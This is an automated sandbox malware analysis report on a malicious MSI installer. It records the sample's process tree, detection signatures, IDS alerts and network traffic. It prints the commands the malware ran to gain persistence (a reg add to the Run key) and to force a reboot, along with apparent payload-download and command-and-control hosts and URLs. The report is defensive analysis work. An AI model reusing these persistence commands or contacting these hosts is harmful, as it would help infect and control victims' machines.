Windows Analysis Report
9rybs.msi

Overview

General Information

Sample name: 9rybs.msi
Analysis ID: 1486731
MD5: e39e03a8e95aec841d8ec9e1ab3d5706
SHA1: 3d9812935a2413fea198c3b11bf48769385bb077
SHA256: 7b67c71ae5aa24c92655d29e37896f639fa42fa79713b174c6a660f5c19e49a2
Tags: msi

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Machine Learning detection for dropped file
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses shutdown.exe to shutdown or reboot the system
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious MsiExec Embedding Parent
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • msiexec.exe (PID: 5464 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\9rybs.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3148 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7176 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7464 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • shutdown.exe (PID: 7620 cmdline: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15 MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PeFIvJrY.exe (PID: 7820 cmdline: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: 65CD1FFDB524F091FC06884DCB1270F9)
  • PeFIvJrY.exe (PID: 7896 cmdline: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" MD5: 65CD1FFDB524F091FC06884DCB1270F9)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" , CommandLine: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, NewProcessName: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, OriginalFileName: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe" , ProcessId: 7820, ProcessName: PeFIvJrY.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PeFIvJrY
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 20.15.106.83, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, Initiated: true, ProcessId: 7820, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49712
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PeFIvJrY
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7408, ParentProcessName: cmd.exe, ProcessCommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ProcessId: 7464, ProcessName: reg.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7176, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49706
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7176, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ProcessId: 7408, ProcessName: cmd.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15, CommandLine: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\shutdown.exe, NewProcessName: C:\Windows\SysWOW64\shutdown.exe, OriginalFileName: C:\Windows\SysWOW64\shutdown.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7176, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15, ProcessId: 7620, ProcessName: shutdown.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7176, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe", ProcessId: 7408, ProcessName: cmd.exe
No Snort rule has matched

IDS alerts (in the order reported):

Timestamp                         SID      Source Port  Destination Port  Protocol  Classtype
2024-08-02T14:17:04.104879+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:02.079215+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.357207+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.995709+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:00.634854+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.822396+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:58.280053+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:58.101078+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:58.520069+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:01.419059+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:00.170890+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.238977+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.120820+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.000829+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:03.129170+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:58.708055+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:49.994894+0200   2001683  443          49707             TCP       Possibly Unwanted Program Detected
2024-08-02T14:16:58.400227+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:05.217884+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:03.799262+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:01.767250+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:02.779659+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:58.828216+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:03.624188+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:00.515857+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.646763+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:00.929624+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:49.899563+0200   2001046  443          49707             TCP       Misc activity
2024-08-02T14:17:00.344289+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:00.753285+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:02.435205+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:03.447548+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:03.975563+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:02.955846+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:01.105312+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:01.591471+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:59.476645+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:02.607625+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:16:48.126661+0200   2001683  443          49706             TCP       Possibly Unwanted Program Detected
2024-08-02T14:17:01.889631+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:01.300206+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:02.261195+0200   2849814  49710        80                TCP       A Network Trojan was detected
2024-08-02T14:17:03.267318+0200   2849814  49710        80                TCP       A Network Trojan was detected

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Users\Public\PeFI\vJrY\PeFI.png | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: Binary string: wininet.pdb source: shi64B2.tmp.3.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdb source: PeFIvJrY.exe, PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 9rybs.msi, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: d3d12.pdbUGP source: shi6530.tmp.3.dr
Source: Binary string: d3d12.pdb source: shi6530.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdbJ source: PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: wininet.pdbUGP source: shi64B2.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0043303C FindFirstFileExW,12_2_0043303C
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00424DC6 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DC6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00424DA6 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DA6
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: GET /carol1.png HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: yznv.prefintions.pro
Source: global traffic | HTTP traffic detected: GET /derrama.png HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: yznv.prefintions.pro
Source: unknown | TCP traffic detected without corresponding DNS query: 20.15.106.83
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /SCP/index.php?VS=VS3&PL=NAO HTTP/1.1 | User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" | Host: 20.15.106.83 | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: yznv.prefintions.pro
Source: global traffic | DNS traffic detected: DNS query: collect.installeranalytics.com
Source: global traffic | DNS traffic detected: DNS query: acons2020temix54.lisf
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: application/x-www-form-urlencoded; charset=utf-8 | User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64) | Host: collect.installeranalytics.com | Content-Length: 167 | Cache-Control: no-cache
Source: shi64B2.tmp.3.dr | String found in binary or memory: http://.css
Source: shi64B2.tmp.3.dr | String found in binary or memory: http://.jpg
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.15.106.83
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.15.106.83/SCP/index.php
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.15.106.83/SCP/index.php?VS=VS3&PL=NAO
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vJrY.png.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vJrY.png.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: vJrY.png.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr | String found in binary or memory: http://collect.installeranalytics.com
Source: vJrY.png.3.dr | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: vJrY.png.3.dr | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: vJrY.png.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vJrY.png.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: vJrY.png.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: shi64B2.tmp.3.dr | String found in binary or memory: http://html4/loose.dtd
Source: vJrY.png.3.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, vJrY.png.3.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: vJrY.png.3.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: vJrY.png.3.dr | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: vJrY.png.3.dr | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vJrY.png.3.dr | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: vJrY.png.3.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | String found in binary or memory: http://stackoverflow.com/q/11564914;
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003336000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://stackoverflow.com/q/14436606/
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | String found in binary or memory: http://stackoverflow.com/q/14436606/WAsReference
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | String found in binary or memory: http://stackoverflow.com/q/2152978/23354
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://t2.symcb.com0
